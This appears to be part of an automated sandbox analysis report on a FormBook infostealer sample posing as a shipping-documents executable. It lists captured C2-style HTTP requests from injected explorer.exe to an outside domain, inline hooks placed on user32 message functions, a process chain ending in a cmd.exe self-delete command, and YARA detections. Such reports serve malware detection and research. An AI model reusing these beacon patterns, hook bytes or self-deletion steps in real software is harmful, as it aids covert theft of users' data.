                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.449768198.185.159.14480C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 4, 2021 07:05:04.803034067 CEST7277OUTGET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.exclusiveflooringcollection.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 4, 2021 07:05:04.979024887 CEST7281INHTTP/1.1 400 Bad Request
                                        Cache-Control: no-cache, must-revalidate
                                        Content-Length: 77564
                                        Content-Type: text/html; charset=UTF-8
                                        Date: Tue, 04 May 2021 05:05:04 UTC
                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        Pragma: no-cache
                                        Server: Squarespace
                                        X-Contextid: GJ1alLZ7/6uMYlJPg
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: 202139769574 Shipping Documents.exe PID: 6728 Parent PID: 5912

                                        General

                                        Start time:07:03:10
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: 202139769574 Shipping Documents.exe PID: 6808 Parent PID: 6728

                                        General

                                        Start time:07:03:11
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6808

                                        General

                                        Start time:07:03:16
                                        Start date:04/05/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: mstsc.exe PID: 6488 Parent PID: 3424

                                        General

                                        Start time:07:03:34
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0xd20000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Analysis Process: cmd.exe PID: 5892 Parent PID: 6488

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Analysis Process: conhost.exe PID: 3984 Parent PID: 5892

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >